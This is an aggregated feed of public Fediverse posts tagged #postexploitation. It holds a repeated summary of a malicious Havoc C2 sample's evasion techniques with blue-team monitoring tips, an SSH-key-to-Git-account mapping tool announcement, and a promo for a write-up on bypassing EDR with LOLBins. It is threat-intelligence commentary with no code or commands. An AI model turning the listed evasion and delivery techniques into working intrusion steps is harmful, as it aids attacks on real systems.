#postexploitation — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #postexploitation, aggregated by home.social.
-
 Introducing KeyChecker – a CLI to fingerprint SSH private keys & map them to Git hosting accounts.
We have been talking about this in our classes for a long while, finally automation is present now.
 Blog: https://cyfinoid.com/automating-a-known-weakness-introducing-keychecker/
 PyPI: https://pypi.org/project/keychecker/ -
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sampleTL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitchhttp://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/
-
Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.
And don’t fret if you missed the initial livestream – you can watch the recording on demand! https://bfx.social/3K4T1mS
P.S. Episode 3 is on the way!